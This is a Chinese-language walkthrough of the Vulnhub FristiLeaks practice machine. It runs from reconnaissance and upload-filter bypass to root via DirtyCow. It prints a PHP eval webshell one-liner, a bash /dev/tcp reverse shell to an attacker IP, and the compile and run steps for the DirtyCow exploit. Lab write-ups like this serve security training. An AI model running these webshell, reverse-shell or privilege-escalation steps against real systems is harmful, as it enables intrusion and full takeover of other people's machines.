Vulnhub-FristiLeaks

admin 2025年5月19日09:33:50评论3 views字数 1126阅读3分45秒阅读模式

靶机安装

FristiLeaks安装后使用vmware打开,网络设置为NET模式还需要在高级设置中按照要求将mac地址设置为:08:00:27:A5:A6:76

信息收集

Vulnhub-FristiLeaks靶机安装成功后便可看到ip直接namp扫描端口Vulnhub-FristiLeaksnmap扫描发现只开放了80端口dirb扫描目录Vulnhub-FristiLeaks发现/robots.txt,访问Vulnhub-FristiLeaks依次访问显示的目录Vulnhub-FristiLeaks。。。。。都显示这个图片,换个扫描器和字典试试,也没有扫描出来,再来看主页的图片Vulnhub-FristiLeaks源代码中也多次提到了fristiVulnhub-FristiLeaks试试访问/fristi目录Vulnhub-FristiLeaks出现登录框,猜测有sql注入抓包后保存为tset.txt,使用sqlmap测试Vulnhub-FristiLeaks测试并不存在sql注入查看源码Vulnhub-FristiLeaks发现提示,且在图片base64编码下存在一段被注释掉的base64字符串,解码后得到一张图片Vulnhub-FristiLeaksVulnhub-FristiLeaks再根据提示,猜测用户名是eezeepz,密码是图片内容登录成功

反弹shell

登录成功后发现存在文件上传点,限制只能上传.jpg .png .gif后缀Wappalyzer查看网页信息,发现使用的是apache 2.2.15版本,存在文件后缀名解析漏洞,默认按最后一个后缀解析文件类型。可以通过上传.php.jpg来绕过限制上传一句话木马<?php @eval($_POST['epoch']);Vulnhub-FristiLeaks上传成功后蚁剑连接连接成功后,kali开监听,蚁剑终端反弹shellVulnhub-FristiLeaks使用nc反弹发现命令不存在,直接使用

bash -i >& /dev/tcp/192.168.84.128/7777 0>&1

反弹shellVulnhub-FristiLeaks反弹成功

提权

首先使用python基础提权

python -c "import pty;pty.spawn('/bin/bash')"

kalipython -m http.server 80开启web服务,靶机使用wget在/tmp目录下载扫描脚本Vulnhub-FristiLeaks下载成功后加执行权限,运行脚本Vulnhub-FristiLeaks查看扫描的结果发现可以使用脏牛提权Vulnhub-FristiLeaks搜索[CVE-2016-5195][https://github.com/FireFart/dirtycow],将dirty.c下载到本地后kali开启web服务,靶机使用wget下载到/tmp目录下

gcc -pthread dirty.c -o dirty -lcrypt

编译后chmod +x ./dirty加权限./dirty +要设置的新密码,便会自动创建一个用户名为firefart,密码为自己设置的root权限的账户Vulnhub-FristiLeakssu firefart切换账户后访问/root 目录下flag即可

总结

难度属于比较简单的吧,个人认为最难的点甚至是发现/fristi目录...

转自:https://www.freebuf.com/articles/web/430481.html

原文始发于微信公众号(船山信安):Vulnhub-FristiLeaks

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月19日09:33:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub-FristiLeakshttps://cn-sec.com/archives/4078800.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息